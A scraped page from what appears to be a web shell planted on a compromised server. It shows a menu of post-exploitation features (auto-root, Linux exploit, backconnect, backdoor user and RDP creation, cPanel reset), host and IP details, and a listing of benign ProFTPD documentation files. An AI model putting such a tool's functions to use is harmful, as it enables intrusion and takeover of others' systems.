Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.186
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
proftpd /
modules /
[ HOME SHELL ]
Name
Size
Permission
Action
index.html
4.66
KB
-rw-r--r--
mod_auth.html
39.51
KB
-rw-r--r--
mod_auth_file.html
9.21
KB
-rw-r--r--
mod_auth_pam.html
5.79
KB
-rw-r--r--
mod_auth_unix.html
10.76
KB
-rw-r--r--
mod_cap.html
8.1
KB
-rw-r--r--
mod_core.html
126.18
KB
-rw-r--r--
mod_ctrls.html
11.58
KB
-rw-r--r--
mod_delay.html
11.43
KB
-rw-r--r--
mod_dso.html
16.33
KB
-rw-r--r--
mod_facl.html
2.22
KB
-rw-r--r--
mod_facts.html
10.83
KB
-rw-r--r--
mod_ident.html
2.78
KB
-rw-r--r--
mod_lang.html
11.19
KB
-rw-r--r--
mod_log.html
20.14
KB
-rw-r--r--
mod_ls.html
8.95
KB
-rw-r--r--
mod_memcache.html
5.05
KB
-rw-r--r--
mod_redis.html
13.45
KB
-rw-r--r--
mod_rlimit.html
9.55
KB
-rw-r--r--
mod_site.html
905
B
-rw-r--r--
mod_xfer.html
24.84
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mod_site.html
<!DOCTYPE html> <html> <head> <title>ProFTPD module mod_site</title> </head> <body bgcolor=white> <hr> <center> <h2><b>ProFTPD module <code>mod_site</code></b></h2> </center> <hr><br> <p> This module is contained in the <code>mod_site.c</code> file for ProFTPD 1.3.<i>x</i>, and is compiled by default. <p> <hr> <h2><a name="Installation">Installation</a></h2> The <code>mod_site</code> module is compiled by default. <p> <hr> <h2><a name="Usage">Usage</a></h2> <p> Example configurations: <pre> # Block use of the SITE CHMOD command for changing file permissions <Limit SITE_CHMOD> DenyAll </Limit> # Block use of the SITE CHGRP command for changing group ownership <Limit SITE_CHGRP> DenyAll </Limit> </pre> <p> <hr> <font size=2><b><i> © Copyright 2002-2011 The ProFTPD Project<br> All Rights Reserved<br> </i></b></font> <hr> </body> </html>
Close